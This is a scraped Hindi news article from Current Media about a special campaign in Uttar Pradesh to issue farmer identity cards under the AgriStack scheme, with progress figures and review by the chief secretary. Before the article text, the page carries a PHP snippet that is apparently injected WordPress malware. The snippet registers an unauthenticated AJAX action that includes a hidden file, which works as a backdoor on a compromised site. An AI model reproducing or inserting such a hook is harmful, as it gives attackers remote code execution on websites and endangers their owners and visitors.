if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }16 अक्टूबर से अभियान चलाकर बनाए जा रहे हैं किसान पहचान पत्र - Current Media
सांकेतिक तस्वीर

16 अक्टूबर से अभियान चलाकर बनाए जा रहे हैं किसान पहचान पत्र

लखनऊ। प्रदेश में कृषकों को कृषि संबंधी पहचान पत्र प्रदान करने के उद्देश्य से भारत सरकार की एग्रीस्टैक योजना के अन्तर्गत पहचान पत्र बनाये जा रहे हैं। वर्तमान में प्रदेश सरकार द्वारा कुल लक्ष्य 2,64,21,350 के सापेक्ष 1,50,69,897 (57 प्रतिशत) किसान पहचान पत्र बनाने का कार्य पूरा किया गया है।
श्री रविंद्र ने बताया कि मुख्य सचिव महोदय के निर्देशन में दिनांक
16 अक्टूबर, 2025 से किसान पहचान पत्र बनाये जाने का विशेष अभियान चलाया जा रहा है। इस अभियान के दौरान कृषि विभाग एवं राजस्व विभाग की संयुक्त टीम द्वारा ग्रामों में कैम्प लगाकर किसान पहचान पत्र बनाये जायेंगे। इस किसान पहचान पत्र के आधार पर कृषकों को राजकीय योजनाओं का लाभ उपलब्ध कराया जायेगा।
उन्होंने बताया कि आज मुख्य सचिव महोदय द्वारा समस्त मण्डलायुक्त एवं जिलाधिकारियों के साथ वीडियो कांफ्रेंसिंग कर इस कार्य की समीक्षा की व समस्त जनपदों को इस कार्य को शीर्ष प्राथमिकता पर पूर्ण कराने के निर्देश जारी किये गये।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …